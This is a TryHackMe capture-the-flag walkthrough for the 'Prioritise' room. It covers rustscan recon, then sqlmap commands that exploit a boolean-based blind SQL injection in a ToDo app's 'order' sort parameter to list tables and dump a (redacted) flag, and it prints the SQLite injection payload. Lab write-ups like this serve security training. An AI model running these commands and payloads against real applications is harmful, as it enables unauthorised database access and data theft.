✅Prioritise TryHackMe Writeup using SQLMap

CTF Writeup / Walkthrough for Prioritise using SQLMap

Prioritise Room

Find the Flag!

Initial Recon

We will use rustscan for port discovery

rustscan -a TARGET_IP -- -A -sC

The following should be the expected output

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 bc7ecc46211d6323652a21383e418c70 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBpuQwTu6CWYZ0CLlQZOeiBk/OXIQa3YrSDsozH9fx64LoNab7VKpvL2sMkC6Hiya5xZlXKOOIb0gGRXbCNPAXYO2v1grjUq8D3xzrOkEwIyoaltEAu2X2z+OEz5LmLS9bRCTqSJuhGF5ciXsuMUs3p9DqDPqRJlePMDm+knO1dI7+mUB8iGkDEirN9iqP/VAfz44awpZG9ZKz1eLV96gaZQqDrGhl7ot7bkLroKfdUMQzOOYy91Ax/RR1Yr3YYCy43X1CiR9lJ/kZnG5bgXwmupCuW0PWBJ4bGkA/JqsxD75z3DCl8aiK0SAUoiUhsUDgTP5pM8Wyt7ANtLV8mPqU32KO//YO/mxjrJoT0erfAxGe1pw0Ry86mMTH+fqen4SjZUenydDgYYadVZvus4TdF90VmnETQ5ubGx0Lvry2PmL2LsgEZYVdYk3bTFNYs9JZMgHnpE1ejx0toupdL0e1P2Xa/Zlqjl3scOQ49F8wziyiqSPkX0nSFV2Cb0t0ud0=
|   256 ea203ed1c491e879ef2d339bf11caf10 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHGWPtvoLcSuiPd+wNAPJ0qq3EEUNg8064D1mn6y6gEShvcHKz+xLg6p3ZgfDZvtYOwtbZ5sn7StlwpFExuJiCE=
|   256 c998ec9871424589e1222a32c4d2c01d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXA8smlcww1+5QTpnojr12eGZDWr//L/ghypXrbf17Z
80/tcp open  rtsp    syn-ack
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-title: Prioritise
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2756
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="../static/css/bootstrap.min.css"
|     crossorigin="anonymous"
|     <link
|     rel="stylesheet"
|     href="../static/css/font-awesome.min.css"
|     crossorigin="anonymous"
|     <link
|     rel="stylesheet"
|     href="../static/css/bootstrap-datepicker.min.css"
|     crossorigin="anonymous"
|     <title>Prioritise</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">Prioritise</span></a>
|     <button
|     class="na
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|   RTSPRequest: 
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|_    Content-Length: 0

It looks like there is only a single http server runnning a ToDo application, nothing interesting for us.

Let's head over to the ToDo app!

ToDo Interface

Let's add few items to the list

As you can see, I tried XSS payload and sql injection payload, but there is no success.

Let's use the Sort Option in the application

sort option

Order By Payload

This could be our valid exploitation point, a perfect GET request.

We can now use SQLMap to do the job.

Attack Phase

FIring up SQLMap

sqlmap -u http://TARGGET_IP/\?order\=date --risk 3 --level 3

We are using SQLMap because we want an automated solution to a Blind SQL Injection, which if you do it manually will take a lot of time

After sometime, running the sqlmap we find a valid payload

[22:19:06] [INFO] checking if the injection point on GET parameter 'order' is a false positive
GET parameter 'order' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 807 HTTP(s) requests:
---
Parameter: order (GET)
    Type: boolean-based blind
    Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
    Payload: order=date AND CASE WHEN 3835=3835 THEN 3835 ELSE JSON(CHAR(88,99,121,110)) END
---
[22:19:14] [INFO] the back-end DBMS is SQLite

Let's check for tables now, since we are using a blind sql injection, we can use threads to make the process faster

sqlmap -u http://TARGET_IP/\?order\=date --risk 3 --level 3 --tables --threads 10

[2 tables]
+-------+
| flag  |
| todos |
+-------+

Well now we can check for the flag using the following command

sqlmap -u http://TARGET/\?order\=date --risk 3 --level 3 -T flag --threads 10 --dump

We now have the flag!

[22:22:51] [INFO] retrieved: 38
[22:23:04] [INFO] retrieved: flag{65f2f8cfd53d59422f3_REDACTED}             
Database: <current>
Table: flag
[1 entry]
+----------------------------------------+
| flag                                   |
+----------------------------------------+
| flag{65f2f8cfd53d59422f3_REDACTED} |
+----------------------------------------+

Happy Hunting 😄 cheers 🍷